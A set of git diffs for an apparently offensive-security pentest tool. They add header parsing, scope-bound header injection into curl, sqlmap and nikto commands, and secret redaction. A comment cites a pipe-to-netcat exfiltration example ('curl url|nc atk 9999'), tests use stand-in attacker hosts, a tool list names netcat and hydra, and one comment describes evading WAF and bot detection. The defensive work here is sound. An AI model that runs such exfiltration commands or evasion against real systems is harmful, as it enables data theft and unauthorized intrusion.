+    const file = join(tmp, "bad.json");
+    await writeFile(file, `{"X-API-Key": 42}`);
+    const r = await parseHeadersFromFile(file);
+    expect(r.ok).toBe(false);
+    if (!r.ok) expect(r.error[0].kind).toBe("invalid-json");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// resolveEffectiveHeaders — layering + scope
+// ---------------------------------------------------------------------------
+
+describe("resolveEffectiveHeaders", () => {
+  it("returns empty for out-of-scope URLs (INV-scope-bound)", () => {
+    const s = makeSession({
+      targets: ["https://example.com"],
+      config: { headers: { Authorization: "Bearer x" } },
+    });
+    const r = resolveEffectiveHeaders(s, "https://evil.com/path");
+    expect(r).toEqual({});
+  });
+
+  it("merges session + credential + request layers", () => {
+    const s = makeSession({
+      config: { headers: { "X-Session": "1", "X-Both": "from-session" } },
+      credentialManager: {
+        listCredentialsWithHeaders: () => [
+          {
+            tokens: { customHeaders: { "X-Cred": "1", "X-Both": "from-cred" } },
+          },
+        ],
+      },
+    });
+    const rec = resolveEffectiveHeaders(s, "https://example.com/api", {
+      "X-Request": "1",
+      "X-Both": "from-request",
+    });
+    expect(rec["X-Session"]).toBe("1");
+    expect(rec["X-Cred"]).toBe("1");
+    expect(rec["X-Request"]).toBe("1");
+    // INV-precedence-deterministic: request beats credential beats session
+    expect(rec["X-Both"]).toBe("from-request");
+  });
+
+  it("preserves first-seen casing on case-insensitive collision", () => {
+    const s = makeSession({
+      config: { headers: { "X-Foo": "lower" } },
+    });
+    const rec = resolveEffectiveHeaders(s, "https://example.com/api", {
+      "x-foo": "upper",
+    });
+    expect(rec["X-Foo"]).toBe("upper");
+    expect(rec["x-foo"]).toBeUndefined();
+  });
+
+  it("respects scopeConstraints.allowedHosts when no target is set", () => {
+    const s = makeSession({
+      targets: [],
+      config: {
+        headers: { "X-Test": "1" },
+        scopeConstraints: { allowedHosts: ["api.internal"] },
+      },
+    });
+    expect(resolveEffectiveHeaders(s, "https://api.internal/x")).toEqual({
+      "X-Test": "1",
+    });
+    expect(resolveEffectiveHeaders(s, "https://example.com/x")).toEqual({});
+  });
+});
+
+// ---------------------------------------------------------------------------
+// targetFetch — proves headers actually hit the network call
+// ---------------------------------------------------------------------------
+
+describe("targetFetch", () => {
+  it("merges resolved headers into the fetch call", async () => {
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "abc" } },
+    });
+    const spy = vi
+      .spyOn(globalThis, "fetch")
+      .mockResolvedValue(new Response("ok"));
+
+    await targetFetch(session, "https://example.com/x");
+
+    expect(spy).toHaveBeenCalledTimes(1);
+    const init = spy.mock.calls[0][1] as RequestInit;
+    expect(init.headers).toMatchObject({ "X-API-Key": "abc" });
+
+    spy.mockRestore();
+  });
+
+  it("does not leak session headers to out-of-scope hosts", async () => {
+    const session = makeSession({
+      config: { headers: { Authorization: "Bearer secret" } },
+    });
+    const spy = vi
+      .spyOn(globalThis, "fetch")
+      .mockResolvedValue(new Response("ok"));
+
+    await targetFetch(session, "https://attacker.example.net/leak");
+
+    const init = spy.mock.calls[0][1] as RequestInit;
+    expect(init.headers).toEqual({});
+
+    spy.mockRestore();
+  });
+});
+
+// ---------------------------------------------------------------------------
+// applyHeadersToShellCommand — injection + fail-closed
+// ---------------------------------------------------------------------------
+
+describe("applyHeadersToShellCommand", () => {
+  it("injects -H flags into curl commands", () => {
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "abc" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "curl https://example.com/api",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("injected");
+    expect(r.tool).toBe("curl");
+    expect(r.command).toContain(`-H "X-API-Key: abc"`);
+  });
+
+  it("returns unknown-tool when the binary is not in the registry (INV-shell-injection)", () => {
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "abc" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "my-custom-tool --target https://example.com",
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("unknown-tool");
+  });
+
+  it("returns no-headers when no in-scope host is present on the command", () => {
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "abc" } },
+    });
+    const r = applyHeadersToShellCommand(
+      "curl https://other.example.net/",
+      session,
+      ["other.example.net"],
+    );
+    expect(r.status).toBe("no-headers");
+  });
+
+  it("skips headers already present on the command", () => {
+    const session = makeSession({
+      config: { headers: { "X-API-Key": "from-session", "X-Other": "1" } },
+    });
+    const r = applyHeadersToShellCommand(
+      `curl -H "X-API-Key: explicit" https://example.com/`,
+      session,
+      ["example.com"],
+    );
+    expect(r.status).toBe("injected");
+    expect(r.command).toContain(`X-API-Key: explicit`);
+    expect(r.command).not.toContain(`X-API-Key: from-session`);
+    expect(r.command).toContain(`X-Other: 1`);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Redaction of header-bearing history entries
+// ---------------------------------------------------------------------------
+
+describe("redactSecretsInHistoryEntry", () => {
+  it("masks the value of /headers add", () => {
+    const r = redactSecretsInHistoryEntry(
+      "/headers add Authorization: Bearer super-secret",
+    );
+    expect(r).toBe("/headers add Authorization: <redacted>");
+  });
+
+  it("masks the value of /headers set", () => {
+    const r = redactSecretsInHistoryEntry("/headers set X-API-Key: abc123");
+    expect(r).toBe("/headers set X-API-Key: <redacted>");
+  });
+
+  it("masks --header CLI flag payload", () => {
+    const r = redactSecretsInHistoryEntry(
+      `pensar pentest --target https://example.com --header "Authorization: Bearer xyz"`,
+    );
+    expect(r).not.toContain("Bearer xyz");
+    expect(r).toContain("Authorization: <redacted>");
+  });
+
+  it("leaves unrelated commands untouched", () => {
+    const input = "/skills list";
+    expect(redactSecretsInHistoryEntry(input)).toBe(input);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Display sensitivity — masking by default
+// ---------------------------------------------------------------------------
+
+describe("renderHeaderValue", () => {
+  it("masks sensitive headers when showSecrets is false", () => {
+    const v = renderHeaderValue("Authorization", "Bearer secret", false);
+    expect(v).not.toContain("secret");
+  });
+
+  it("reveals sensitive headers when showSecrets is true", () => {
+    const v = renderHeaderValue("Authorization", "Bearer secret", true);
+    expect(v).toContain("secret");
+  });
+
+  it("does not mask non-sensitive headers", () => {
+    const v = renderHeaderValue("X-Request-Id", "abc-123", false);
+    expect(v).toBe("abc-123");
+  });
+
+  it("isSensitiveHeaderName covers the common cases", () => {
+    expect(isSensitiveHeaderName("Authorization")).toBe(true);
+    expect(isSensitiveHeaderName("Cookie")).toBe(true);
+    expect(isSensitiveHeaderName("X-API-Key")).toBe(true);
+    expect(isSensitiveHeaderName("Set-Cookie")).toBe(true);
+    expect(isSensitiveHeaderName("User-Agent")).toBe(false);
+  });
+});

--- a/src/core/http/parse.ts
+++ b/src/core/http/parse.ts
@@ -1,12 +1,5 @@
-/**
- * Parser for header inputs across every surface (CLI flags, config file
- * imports, slash commands, dialog forms).
- *
- * Contract: `parseHeaderLine` is total — every input string returns
- * either a valid `HeaderEntry` or a typed `ParseError`. No throws, no
- * silent acceptance. This is INV-parser-total and INV-validated-at-
- * boundary in the headers plan.
- */
+// Total parser for header inputs. Every input returns either a
+// `HeaderEntry` or a typed `ParseError` — no throws, no silent accepts.
 
 import type { HeaderRecord } from "./types";
 
@@ -33,19 +26,12 @@ export type ParseError =
 
 export type Result<T, E> = { ok: true; value: T } | { ok: false; error: E };
 
-/**
- * RFC 7230 token chars allowed in header names. Excludes whitespace,
- * delimiters, and control chars. Case is preserved for display but
- * compared lowercase elsewhere.
- */
+// RFC 7230 token chars allowed in header names.
 const NAME_TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;
 const NAME_CHAR = /[!#$%&'*+\-.^_`|~0-9A-Za-z]/;
 
-/**
- * Strip a leading `-H`, `-H=`, or `--header` prefix so curl-paste
- * inputs `parseHeaderLine("-H 'X-API-Key: abc'")` work without the
- * user pre-trimming.
- */
+// Strip a leading `-H`/`--header` (with or without `=`) so curl-paste
+// input like `-H 'X-API-Key: abc'` parses without pre-trimming.
 function stripCurlPrefix(input: string): string {
   let s = input.trim();
   if (s.startsWith("-H=")) s = s.slice(3);
@@ -62,14 +48,8 @@ function stripCurlPrefix(input: string): string {
   return s;
 }
 
-/**
- * Parse a single header line. Accepts every documented format —
- * `K:V`, `K: V`, curl `-H "K: V"`, with surrounding quotes — and
- * returns either a branded `HeaderEntry` or a typed `ParseError`.
- *
- * Empty values are RFC-legal and accepted. CRLF in the value is
- * rejected (header injection). Whitespace in the name is rejected.
- */
+// Empty values are RFC-legal and accepted. CRLF in the value is rejected
+// (header injection). Whitespace in the name is rejected.
 export function parseHeaderLine(
   input: string,
 ): Result<HeaderEntry, ParseError> {
@@ -106,9 +86,7 @@ export function parseHeaderLine(
     }
   }
 
-  // Trim leading whitespace from value per RFC 7230 — preserve trailing
-  // whitespace? RFC says optional whitespace is trimmable from both ends.
-  // Tolerate but normalize.
+  // RFC 7230 allows trimming OWS from both ends of the value.
   const value = rawValue.replace(/^\s+/, "").replace(/\s+$/, "");
 
   for (let i = 0; i < value.length; i++) {
@@ -119,8 +97,7 @@ export function parseHeaderLine(
         error: { kind: "crlf-in-value", input, position: i },
       };
     }
-    // RFC 7230 allows printable ASCII + HTAB; reject everything else
-    // below 0x20 except tab.
+    // RFC 7230 allows printable ASCII + HTAB.
     if (code < 0x20 && code !== 0x09) {
       return {
         ok: false,
@@ -135,11 +112,8 @@ export function parseHeaderLine(
   };
 }
 
-/**
- * Parse newline-separated or single-string bulk input (e.g. a multi-
- * line paste, or the contents of a non-JSON `--headers-from` file).
- * Returns all errors with line numbers — no partial application.
- */
+// Bulk parse newline-separated input. Returns ALL errors (with line
+// numbers) — never partial success.
 function parseHeaderList(input: string): Result<HeaderEntry[], ParseError[]> {
   const lines = input.split(/\r?\n/);
   const entries: HeaderEntry[] = [];
@@ -178,11 +152,6 @@ function parseHeaderList(input: string): Result<HeaderEntry[], ParseError[]> {
   return { ok: true, value: entries };
 }
 
-/**
- * Parse a `Record<string, string>` (e.g. JSON object) into branded
- * entries. Used by `parseHeadersFromFile` (JSON branch) and by the
- * global-config loader.
- */
 function parseHeaderRecord(
   record: HeaderRecord,
 ): Result<HeaderEntry[], ParseError[]> {
@@ -190,12 +159,8 @@ function parseHeaderRecord(
   return parseHeaderList(lines.join("\n"));
 }
 
-/**
- * Parse the contents of a `--headers-from <file>` argument.
- *
- * Format auto-detection: first non-whitespace `{` → JSON object;
- * otherwise newline-separated `Name: Value` with `#` comments.
- */
+// Format auto-detection: leading `{` → JSON object; otherwise
+// newline-separated `Name: Value` with `#` comments.
 export async function parseHeadersFromFile(
   filePath: string,
 ): Promise<Result<HeaderEntry[], ParseError[]>> {
@@ -245,10 +210,6 @@ export async function parseHeadersFromFile(
   return parseHeaderList(raw);
 }
 
-/**
- * Produce a one-line, actionable hint for a `ParseError`. Best-effort —
- * an empty string is returned when no useful suggestion is available.
- */
 function hintFor(error: ParseError): string {
   switch (error.kind) {
     case "missing-colon":
@@ -272,12 +233,8 @@ function hintFor(error: ParseError): string {
   }
 }
 
-/**
- * Format a `ParseError` for display in stderr / timeline / dialog form
- * helpers. Always emits a short reason on the first line and a hint on
- * the second; never includes the raw header value (which may be
- * sensitive).
- */
+// Format a `ParseError` for display. Never echoes the raw value
+// (which may carry a secret).
 export function formatParseError(error: ParseError): string {
   const hint = hintFor(error);
   switch (error.kind) {

--- a/src/core/http/parse.ts
+++ b/src/core/http/parse.ts
@@ -1,0 +1,300 @@
+/**
+ * Parser for header inputs across every surface (CLI flags, config file
+ * imports, slash commands, dialog forms).
+ *
+ * Contract: `parseHeaderLine` is total — every input string returns
+ * either a valid `HeaderEntry` or a typed `ParseError`. No throws, no
+ * silent acceptance. This is INV-parser-total and INV-validated-at-
+ * boundary in the headers plan.
+ */
+
+import type { HeaderRecord } from "./types";
+
+export type HeaderEntry = {
+  readonly name: string;
+  readonly value: string;
+};
+
+export type ParseError =
+  | { kind: "missing-colon"; input: string }
+  | { kind: "empty-name"; input: string }
+  | { kind: "name-has-whitespace"; input: string }
+  | { kind: "invalid-name-char"; input: string; position: number; char: string }
+  | { kind: "control-char-in-value"; input: string; position: number }
+  | { kind: "crlf-in-value"; input: string; position: number }
+  | {
+      kind: "duplicate-key-in-bulk";
+      key: string;
+      firstAt: number;
+      secondAt: number;
+    }
+  | { kind: "invalid-json"; input: string; message: string }
+  | { kind: "file-read-failed"; path: string; message: string };
+
+export type Result<T, E> = { ok: true; value: T } | { ok: false; error: E };
+
+/**
+ * RFC 7230 token chars allowed in header names. Excludes whitespace,
+ * delimiters, and control chars. Case is preserved for display but
+ * compared lowercase elsewhere.
+ */
+const NAME_TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;
+const NAME_CHAR = /[!#$%&'*+\-.^_`|~0-9A-Za-z]/;
+
+/**
+ * Strip a leading `-H`, `-H=`, or `--header` prefix so curl-paste
+ * inputs `parseHeaderLine("-H 'X-API-Key: abc'")` work without the
+ * user pre-trimming.
+ */
+function stripCurlPrefix(input: string): string {
+  let s = input.trim();
+  if (s.startsWith("-H=")) s = s.slice(3);
+  else if (s.startsWith("--header=")) s = s.slice(9);
+  else if (s.startsWith("-H ")) s = s.slice(3);
+  else if (s.startsWith("--header ")) s = s.slice(9);
+  s = s.trim();
+  if (
+    (s.startsWith('"') && s.endsWith('"')) ||
+    (s.startsWith("'") && s.endsWith("'"))
+  ) {
+    s = s.slice(1, -1);
+  }
+  return s;
+}
+
+/**
+ * Parse a single header line. Accepts every documented format —
+ * `K:V`, `K: V`, curl `-H "K: V"`, with surrounding quotes — and
+ * returns either a branded `HeaderEntry` or a typed `ParseError`.
+ *
+ * Empty values are RFC-legal and accepted. CRLF in the value is
+ * rejected (header injection). Whitespace in the name is rejected.
+ */
+export function parseHeaderLine(
+  input: string,
+): Result<HeaderEntry, ParseError> {
+  const raw = stripCurlPrefix(input);
+
+  const colonIdx = raw.indexOf(":");
+  if (colonIdx === -1) {
+    return { ok: false, error: { kind: "missing-colon", input } };
+  }
+
+  const rawName = raw.slice(0, colonIdx);
+  const rawValue = raw.slice(colonIdx + 1);
+
+  const name = rawName.trim();
+  if (name.length === 0) {
+    return { ok: false, error: { kind: "empty-name", input } };
+  }
+  if (/\s/.test(name)) {
+    return { ok: false, error: { kind: "name-has-whitespace", input } };
+  }
+  if (!NAME_TOKEN.test(name)) {
+    for (let i = 0; i < name.length; i++) {
+      if (!NAME_CHAR.test(name[i]!)) {
+        return {
+          ok: false,
+          error: {
+            kind: "invalid-name-char",
+            input,
+            position: i,
+            char: name[i]!,
+          },
+        };
+      }
+    }
+  }
+
+  // Trim leading whitespace from value per RFC 7230 — preserve trailing
+  // whitespace? RFC says optional whitespace is trimmable from both ends.
+  // Tolerate but normalize.
+  const value = rawValue.replace(/^\s+/, "").replace(/\s+$/, "");
+
+  for (let i = 0; i < value.length; i++) {
+    const code = value.charCodeAt(i);
+    if (code === 0x0d || code === 0x0a) {
+      return {
+        ok: false,
+        error: { kind: "crlf-in-value", input, position: i },
+      };
+    }
+    // RFC 7230 allows printable ASCII + HTAB; reject everything else
+    // below 0x20 except tab.
+    if (code < 0x20 && code !== 0x09) {
+      return {
+        ok: false,
+        error: { kind: "control-char-in-value", input, position: i },
+      };
+    }
+  }
+
+  return {
+    ok: true,
+    value: { name, value },
+  };
+}
+
+/**
+ * Parse newline-separated or single-string bulk input (e.g. a multi-
+ * line paste, or the contents of a non-JSON `--headers-from` file).
+ * Returns all errors with line numbers — no partial application.
+ */
+function parseHeaderList(input: string): Result<HeaderEntry[], ParseError[]> {
+  const lines = input.split(/\r?\n/);
+  const entries: HeaderEntry[] = [];
+  const errors: ParseError[] = [];
+  const seenKeys = new Map<string, number>();
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i]!;
+    const trimmed = line.trim();
+    if (trimmed.length === 0) continue;
+    if (trimmed.startsWith("#")) continue;
+
+    const parsed = parseHeaderLine(line);
+    if (!parsed.ok) {
+      errors.push(parsed.error);
+      continue;
+    }
+    const canonical = parsed.value.name.toLowerCase();
+    const firstAt = seenKeys.get(canonical);
+    if (firstAt !== undefined) {
+      errors.push({
+        kind: "duplicate-key-in-bulk",
+        key: parsed.value.name,
+        firstAt,
+        secondAt: i,
+      });
+      continue;
+    }
+    seenKeys.set(canonical, i);
+    entries.push(parsed.value);
+  }
+
+  if (errors.length > 0) {
+    return { ok: false, error: errors };
+  }
+  return { ok: true, value: entries };
+}
+
+/**
+ * Parse a `Record<string, string>` (e.g. JSON object) into branded
+ * entries. Used by `parseHeadersFromFile` (JSON branch) and by the
+ * global-config loader.
+ */
+function parseHeaderRecord(
+  record: HeaderRecord,
+): Result<HeaderEntry[], ParseError[]> {
+  const lines = Object.entries(record).map(([k, v]) => `${k}: ${v}`);
+  return parseHeaderList(lines.join("\n"));
+}
+
+/**
+ * Parse the contents of a `--headers-from <file>` argument.
+ *
+ * Format auto-detection: first non-whitespace `{` → JSON object;
+ * otherwise newline-separated `Name: Value` with `#` comments.
+ */
+export async function parseHeadersFromFile(
+  filePath: string,
+): Promise<Result<HeaderEntry[], ParseError[]>> {
+  const fs = await import("fs/promises");
+  let raw: string;
+  try {
+    raw = await fs.readFile(filePath, "utf-8");
+  } catch (e) {
+    const msg = e instanceof Error ? e.message : String(e);
+    return {
+      ok: false,
+      error: [{ kind: "file-read-failed", path: filePath, message: msg }],
+    };
+  }
+
+  const firstNonWs = raw.match(/\S/);
+  if (firstNonWs && firstNonWs[0] === "{") {
+    try {
+      const obj = JSON.parse(raw);
+      if (
+        typeof obj !== "object" ||
+        obj === null ||
+        Array.isArray(obj) ||
+        Object.values(obj).some((v) => typeof v !== "string")
+      ) {
+        return {
+          ok: false,
+          error: [
+            {
+              kind: "invalid-json",
+              input: raw,
+              message: "expected a flat object of string values",
+            },
+          ],
+        };
+      }
+      return parseHeaderRecord(obj as HeaderRecord);
+    } catch (e) {
+      const msg = e instanceof Error ? e.message : String(e);
+      return {
+        ok: false,
+        error: [{ kind: "invalid-json", input: raw, message: msg }],
+      };
+    }
+  }
+
+  return parseHeaderList(raw);
+}
+
+/**
+ * Produce a one-line, actionable hint for a `ParseError`. Best-effort —
+ * an empty string is returned when no useful suggestion is available.
+ */
+function hintFor(error: ParseError): string {
+  switch (error.kind) {
+    case "missing-colon":
+      return "header name and value must be separated by a colon (Name: Value)";
+    case "empty-name":
+      return "header name cannot be empty — got a bare colon";
+    case "name-has-whitespace":
+      return "header names cannot contain whitespace — did you mean to use a hyphen?";
+    case "invalid-name-char":
+      return `'${error.char}' is not allowed in header names (use letters, digits, hyphens, or any of !#$%&'*+-.^_\`|~)`;
+    case "control-char-in-value":
+      return "header values cannot contain control characters (CR, LF, NUL, etc.)";
+    case "crlf-in-value":
+      return "header values cannot contain CR/LF (HTTP header injection risk)";
+    case "duplicate-key-in-bulk":
+      return `'${error.key}' was set twice in this batch — keep only one (later value would win)`;
+    case "invalid-json":
+      return 'expected a JSON object like {"X-API-Key": "abc"} with string values only';
+    case "file-read-failed":
+      return `could not read ${error.path}`;
+  }
+}
+
+/**
+ * Format a `ParseError` for display in stderr / timeline / dialog form
+ * helpers. Always emits a short reason on the first line and a hint on
+ * the second; never includes the raw header value (which may be
+ * sensitive).
+ */
+export function formatParseError(error: ParseError): string {
+  const hint = hintFor(error);
+  switch (error.kind) {
+    case "missing-colon":
+    case "empty-name":
+    case "name-has-whitespace":
+      return `reason: ${error.kind}\nhint:   ${hint}`;
+    case "invalid-name-char":
+      return `reason: ${error.kind} at position ${error.position} ('${error.char}')\nhint:   ${hint}`;
+    case "control-char-in-value":
+    case "crlf-in-value":
+      return `reason: ${error.kind} at position ${error.position}\nhint:   ${hint}`;
+    case "duplicate-key-in-bulk":
+      return `reason: duplicate key '${error.key}' (lines ${error.firstAt + 1} and ${error.secondAt + 1})\nhint:   ${hint}`;
+    case "invalid-json":
+      return `reason: ${error.kind}: ${error.message}\nhint:   ${hint}`;
+    case "file-read-failed":
+      return `reason: file-read-failed: ${error.message}\nhint:   ${hint}`;
+  }
+}

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -380,22 +380,52 @@ const COMMAND_PREFIX_STRIP =
   /^\s*(?:sudo\s+(?:-[^\s]*\s+)*|timeout\s+\S+\s+|env\s+(?:\S+=\S+\s+)+|nohup\s+)+/;
 
 /**
- * Identify the first HTTP tool name on a command line, stripping common
- * wrappers (`sudo`, `timeout N`, `env K=V`, `nohup`). Returns `null` if
+ * Extract the leading tool name from a command line, stripping common
+ * wrappers (`sudo`, `timeout N`, `env K=V`, `nohup`). Returns `null`
+ * for pipelined / chained commands or empty input.
+ */
+function extractLeadingTool(command: string): string | null {
+  if (COMMAND_SPLIT.test(` ${command}`)) return null;
+  const stripped = command.replace(COMMAND_PREFIX_STRIP, "");
+  const firstWord = stripped.trim().split(/\s+/)[0];
+  return firstWord || null;
+}
+
+/**
+ * Networking tools that operate below the HTTP layer and never send
+ * HTTP headers. These must not be blocked by the fail-closed header
+ * injection logic — headers are simply irrelevant for them.
+ */
+const NON_HTTP_TOOLS: ReadonlySet<string> = new Set([
+  "nmap",
+  "masscan",
+  "dig",
+  "host",
+  "whois",
+  "ping",
+  "traceroute",
+  "ssh",
+  "telnet",
+  "nc",
+  "ncat",
+  "netcat",
+  "openssl",
+  "sslscan",
+  "testssl",
+  "hydra",
+  "subfinder",
+  "amass",
+]);
+
+/**
+ * Identify the first HTTP tool name on a command line. Returns `null` if
  * the leading word is not in `shellInjectorRegistry` or if the command
  * is pipelined / chained (the safe answer in that case is "don't
  * inject" so the caller can fail closed).
  */
 function detectHttpToolOnCommand(command: string): string | null {
-  // Reject pipelined / chained commands — we cannot safely inject into
-  // a pipeline. Caller fails closed.
-  if (COMMAND_SPLIT.test(` ${command}`)) return null;
-
-  const stripped = command.replace(COMMAND_PREFIX_STRIP, "");
-  const firstWord = stripped.trim().split(/\s+/)[0];
-  if (!firstWord) return null;
-
-  if (shellInjectorRegistry.has(firstWord)) return firstWord;
+  const tool = extractLeadingTool(command);
+  if (tool && shellInjectorRegistry.has(tool)) return tool;
   return null;
 }
 
@@ -447,6 +477,10 @@ export function applyHeadersToShellCommand(
 
   const tool = detectHttpToolOnCommand(command);
   if (!tool) {
+    const leading = extractLeadingTool(command);
+    if (leading && NON_HTTP_TOOLS.has(leading)) {
+      return { command, status: "no-headers", tool: null };
+    }
     return { command, status: "unknown-tool", tool: null };
   }
 

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -134,7 +134,7 @@ export function resolveEffectiveHeaders(
   requestOverrides?: HeaderRecord,
 ): HeaderRecord {
   if (!isUrlInSessionScope(url, session)) {
-    return {};
+    return requestOverrides ?? {};
   }
 
   // Session layer is the only persisted set today; global defaults are
@@ -247,7 +247,7 @@ type ShellInjector = (command: string, headers: HeaderRecord) => string;
  * Escapes `"`, `\`, `$`, and `` ` ``. The caller wraps the result in
  * double quotes itself.
  */
-function shellQuote(value: string): string {
+export function shellQuote(value: string): string {
   return value
     .replace(/\\/g, "\\\\")
     .replace(/"/g, '\\"')

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -74,7 +74,7 @@ function getAllowedHosts(session: ResolverSession): string[] {
 }
 
 function isHostInScope(hostname: string, allowedHosts: string[]): boolean {
-  if (allowedHosts.length === 0) return true;
+  if (allowedHosts.length === 0) return false;
   const lower = hostname.toLowerCase();
   for (const allowed of allowedHosts) {
     if (lower === allowed) return true;

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -252,7 +252,9 @@ export function shellQuote(value: string): string {
     .replace(/\\/g, "\\\\")
     .replace(/"/g, '\\"')
     .replace(/\$/g, "\\$")
-    .replace(/`/g, "\\`");
+    .replace(/`/g, "\\`")
+    .replace(/\n/g, "\\n")
+    .replace(/\r/g, "\\r");
 }
 
 /**
@@ -300,7 +302,7 @@ const injectCurl: ShellInjector = (command, headers) => {
   const existing = existingHeaderNames(command);
   const flags = buildHFlags(headers, existing, "-H");
   if (!flags) return command;
-  return command.replace(/(\bcurl\b)/, (m) => `${m} ${flags}`);
+  return command.replace(/(?<!\/)(\bcurl\b)/, (m) => `${m} ${flags}`);
 };
 
 const injectWget: ShellInjector = (command, headers) => {
@@ -312,7 +314,7 @@ const injectWget: ShellInjector = (command, headers) => {
   }
   if (parts.length === 0) return command;
   const joined = parts.join(" ");
-  return command.replace(/(\bwget\b)/, (m) => `${m} ${joined}`);
+  return command.replace(/(?<!\/)(\bwget\b)/, (m) => `${m} ${joined}`);
 };
 
 const injectGenericH: (tool: string) => ShellInjector =
@@ -320,7 +322,7 @@ const injectGenericH: (tool: string) => ShellInjector =
     const existing = existingHeaderNames(command);
     const flags = buildHFlags(headers, existing, "-H");
     if (!flags) return command;
-    const re = new RegExp(`(\\b${tool}\\b)`);
+    const re = new RegExp(`(?<!/)(\\b${tool}\\b)`);
     return command.replace(re, (m) => `${m} ${flags}`);
   };
 
@@ -333,7 +335,7 @@ const injectSqlmap: ShellInjector = (command, headers) => {
   }
   if (lines.length === 0) return command;
   const headerArg = `--headers="${shellQuote(lines.join("\\n"))}"`;
-  return command.replace(/(\bsqlmap\b)/, (m) => `${m} ${headerArg}`);
+  return command.replace(/(?<!\/)(\bsqlmap\b)/, (m) => `${m} ${headerArg}`);
 };
 
 const injectNikto: ShellInjector = (command, headers) => {
@@ -349,7 +351,7 @@ const injectNikto: ShellInjector = (command, headers) => {
   // in the shell command would split it across lines in persistent /
   // line-based shells. Mirrors the sqlmap injector above.
   const arg = `-headers "${shellQuote(lines.join("\\n"))}"`;
-  return command.replace(/(\bnikto\b)/, (m) => `${m} ${arg}`);
+  return command.replace(/(?<!\/)(\bnikto\b)/, (m) => `${m} ${arg}`);
 };
 
 /**

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -171,6 +171,38 @@ export function resolveEffectiveHeaders(
 }
 
 // ---------------------------------------------------------------------------
+// Browser-safe header filtering
+// ---------------------------------------------------------------------------
+
+/**
+ * Headers managed by the browser engine that must NOT be passed via
+ * Playwright's `extraHTTPHeaders` (which unconditionally overrides the
+ * browser's own values). Notably, `User-Agent` is set via Chromium's
+ * `--user-agent` flag with a realistic desktop string — leaking the
+ * session's `User-Agent: pensar-apex` default here would defeat WAF/CDN
+ * bypass and bot detection avoidance.
+ */
+const BROWSER_MANAGED_HEADERS: ReadonlySet<string> = new Set(["user-agent"]);
+
+/**
+ * Strip headers that the browser manages internally before passing to
+ * Playwright's `extraHTTPHeaders`. Use this at every boundary where
+ * resolved session headers flow into a browser context.
+ */
+export function stripBrowserManagedHeaders(
+  headers: HeaderRecord | undefined,
+): HeaderRecord | undefined {
+  if (!headers) return headers;
+  let filtered: HeaderRecord | undefined;
+  for (const [key, value] of Object.entries(headers)) {
+    if (BROWSER_MANAGED_HEADERS.has(key.toLowerCase())) continue;
+    filtered ??= {};
+    filtered[key] = value;
+  }
+  return filtered;
+}
+
+// ---------------------------------------------------------------------------
 // Fetch + RequestInit
 // ---------------------------------------------------------------------------
 

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -344,7 +344,11 @@ const injectNikto: ShellInjector = (command, headers) => {
     lines.push(`${name}: ${value}`);
   }
   if (lines.length === 0) return command;
-  const arg = `-headers "${shellQuote(lines.join("\n"))}"`;
+  // Use the literal two-character escape `\n`, not a 0x0A byte. Nikto
+  // interprets `\n` as the header separator, and embedding a raw newline
+  // in the shell command would split it across lines in persistent /
+  // line-based shells. Mirrors the sqlmap injector above.
+  const arg = `-headers "${shellQuote(lines.join("\\n"))}"`;
   return command.replace(/(\bnikto\b)/, `$1 ${arg}`);
 };
 
@@ -375,9 +379,44 @@ const shellInjectorRegistry: ReadonlyMap<string, ShellInjector> = new Map<
 // Shell command header injection
 // ---------------------------------------------------------------------------
 
-const COMMAND_SPLIT = /(?:^|\s)(?:[;&|]{1,2})/;
 const COMMAND_PREFIX_STRIP =
   /^\s*(?:sudo\s+(?:-[^\s]*\s+)*|timeout\s+\S+\s+|env\s+(?:\S+=\S+\s+)+|nohup\s+)+/;
+
+/**
+ * True iff the command contains a shell control operator (`;`, `&`, `|`,
+ * or any doubled form) outside single/double quotes. A regex on its own
+ * cannot do this safely — either it requires whitespace before the
+ * operator (and misses `curl url|nc atk 9999`) or it matches operators
+ * inside quoted argument values (`curl -H "X: a|b" url`). So we walk
+ * the string and respect quote state.
+ *
+ * Backslash escapes a single following character outside single quotes
+ * (POSIX rule). Inside single quotes nothing is escaped — the only way
+ * out is a closing `'`.
+ */
+function hasShellOperatorOutsideQuotes(command: string): boolean {
+  let inSingle = false;
+  let inDouble = false;
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i];
+    if (!inSingle && ch === "\\" && i + 1 < command.length) {
+      i++; // skip the escaped character
+      continue;
+    }
+    if (!inDouble && ch === "'") {
+      inSingle = !inSingle;
+      continue;
+    }
+    if (!inSingle && ch === '"') {
+      inDouble = !inDouble;
+      continue;
+    }
+    if (!inSingle && !inDouble) {
+      if (ch === ";" || ch === "&" || ch === "|") return true;
+    }
+  }
+  return false;
+}
 
 /**
  * Extract the leading tool name from a command line, stripping common
@@ -385,7 +424,7 @@ const COMMAND_PREFIX_STRIP =
  * for pipelined / chained commands or empty input.
  */
 function extractLeadingTool(command: string): string | null {
-  if (COMMAND_SPLIT.test(` ${command}`)) return null;
+  if (hasShellOperatorOutsideQuotes(command)) return null;
   const stripped = command.replace(COMMAND_PREFIX_STRIP, "");
   const firstWord = stripped.trim().split(/\s+/)[0];
   return firstWord || null;

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -1,0 +1,459 @@
+/**
